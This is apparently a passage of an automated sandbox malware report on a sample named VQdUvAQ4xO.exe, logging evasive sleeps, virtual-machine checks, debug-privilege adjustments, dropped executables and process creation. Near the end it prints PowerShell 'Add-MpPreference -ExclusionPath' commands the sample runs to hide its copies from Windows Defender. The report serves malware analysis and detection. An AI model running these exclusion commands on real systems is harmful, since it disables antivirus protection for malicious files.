                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -600000s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -599844s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -599702s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 3052Thread sleep time: -14400000s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -598844s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -598625s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -598438s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -598110s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -597766s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -597594s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -597441s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -596766s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -596608s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -596422s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 3052Thread sleep time: -900000s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -596297s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -596186s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -596049s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595907s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595772s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595655s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595547s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595430s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595329s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595204s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -100000s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99988s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99875s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99765s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99633s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99492s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99263s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99062s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -98943s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -98812s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -98703s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -98593s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -593563s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -593454s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -593329s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -593188s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -593079s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592954s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592829s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592704s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592579s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592469s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592357s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592249s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592133s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592029s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -591870s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -591704s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -591446s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -591333s >= -30000s
                              Source: C:\Windows\System32\r6Lr6XbTWt.exe TID: 4628Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 6392Thread sleep time: -30000s >= -30000s
                              Source: C:\Windows\System32\r6Lr6XbTWt.exe TID: 4484Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\0eDO5Zbs.exe TID: 7424Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe TID: 8024Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe TID: 2124Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 6872Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 480Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\r6Lr6XbTWt.exe TID: 7260Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\0eDO5Zbs.exe TID: 8016Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe TID: 1068Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe TID: 3748Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 7776Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 884Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\0eDO5Zbs.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\0eDO5Zbs.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599891Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599766Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599657Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599485Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599370Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599233Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599125Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 100000Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99875Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99765Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99656Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99547Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99437Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99328Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99219Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 99094Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 98984Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 98875Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 98765Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 98656Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597656Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597519Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597391Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597219Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 597046Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 30000
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 600000
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 599844
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 599702
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 3600000
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 598844
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 598625
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 598438
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 598110
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 597766
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 597594
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 597441
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596766
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596608
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596422
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 300000
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596297
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596186
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596049
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595907
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595772
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595655
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595547
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595430
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595329
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595204
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 100000
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99988
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99875
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99765
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99633
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99492
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99263
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 99062
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 98943
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 98812
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 98703
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 98593
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593563
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593454
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593329
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593188
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593079
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592954
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592829
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592704
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592579
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592469
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592357
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592249
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592133
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592029
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 591870
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 591704
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 591446
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 591333
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\0eDO5Zbs.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\0eDO5Zbs.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1933676498.000000001C096000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a337
                              Source: VQdUvAQ4xO.exe, 00000000.00000002.1917936559.000000001B47A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                              Source: VQdUvAQ4xO.exe, tNOtXAG6xwxcUNu9tjBa.exe.0.dr, r6Lr6XbTWt.exe.0.dr, JOajDppbSkfqSPK1G9zAbH.exe.0.dr | Binary or memory string: AwJAgjHO0YkTHGFSakR5
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Process token adjusted: Debug
                              Source: C:\Windows\System32\r6Lr6XbTWt.exe | Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Memory allocated: page read and write | page guard

                              HIPS / PFW / Operating System Protection Evasion

                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe'
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\r6Lr6XbTWt.exe'
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\0eDO5Zbs.exe'
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe'
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe'
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VQdUvAQ4xO.exe'
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline"
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cJIROItyvb.bat"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A2D.tmp" "c:\Windows\System32\CSCA8FE6D7D9B7A4B07A0A2A3B7931FCBDF.TMP"
                              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
